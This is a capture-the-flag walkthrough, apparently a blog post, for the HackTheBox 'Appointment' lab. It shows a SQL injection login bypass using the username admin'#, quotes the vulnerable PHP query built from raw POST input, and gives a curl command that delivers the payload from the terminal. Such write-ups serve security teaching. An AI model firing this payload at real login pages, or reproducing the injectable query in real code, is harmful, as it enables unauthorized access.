Attempting Tier 1: Appointment
This is the first challenge in the 1st tier, right after you complete the challenges in 0th tier. In this challenge, a walkthrough is prescribed for how to perform SQL Injection. The lesson is a pretty nice step-up from the previous challenges, and a fun one to solve at that.
To complete the challenge, essentially you have to open the webpage in your browser and then enter the injection credentials, which are as follows -
username - admin'#
password - anystring
The way this specific injection works is it injects the username and escapes the sequence so that the password field is not considered during the DB query. A beautiful walkthrough is available on HTB, you can check that out for more details.
Now, is it possible to perform this injection without using your browser, only using your terminal?
There are a range of reasons why you might do this. For e.g. the proxy might not be setup correctly so you cannot open the IP of the target machine in your browser (so you are NOT on the same network as the target on your browser), so you cannot view the webpage. In this case you will not be able to get the flag required to complete the challenge. However there's a little workaround.
Using the excellently written walkthrough (massive props to @0ne-nine9 and @ilinor), we can find lots of valuable information. Studying the php code mentioned in the walkthrough. we can understand how the authentication is happening specifically
$username=$_POST['username']; # User-specified username.
$password=$_POST['password']; #User-specified password.
$sql="SELECT * FROM users WHERE username='$username' AND password='$password'";
# Query for user/pass retrieval from the DB.
A POST request is made when you click the login button on the webpage, and then two input fields are sent in the POST request - username and password. With all this information, we can essentially form a cURL request and access the webpage.
Conversely you could also perform a GET request and get the website html on your terminal. You will find valuable information in the html markdown of the form field -
<div class="wrap-input100 validate-input" data-validate = "Enter username">
<input class="input100" type="text" name="username" placeholder="Username">
<span class="focus-input100" data-placeholder=""></span></div>
<div class="wrap-input100 validate-input" data-validate="Enter password">
<input class="input100" type="password" name="password" placeholder="Password">
<span class="focus-input100" data-placeholder=""></span></div>
Here, you can see the name values for the username and password field, which is the name that will be used to POST the data to the server.
Now using this we can form a cURL request using Postman, it is as follows -
curl --location 'ip_target_machine' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'username=admin'\''#' \
--data-urlencode 'password=anythingyouwant'
Usually data is sent as x-www-form-urlencoded if you are sending an HTTP request with only text parameters.
The password can be whatever you want it to be, because the injection overrides the requirement for a password.
Now if you enter this in the terminal, the entire http page should get published in your terminal, along with the successful authentication message at the bottom -
<div><h3>Congratulations!</h3><br><h4>Your flag is: flag0000000000000000</h4></div>
Congrats! You just got the flag without using a browser, or any GUI for that matter!
Top comments (0)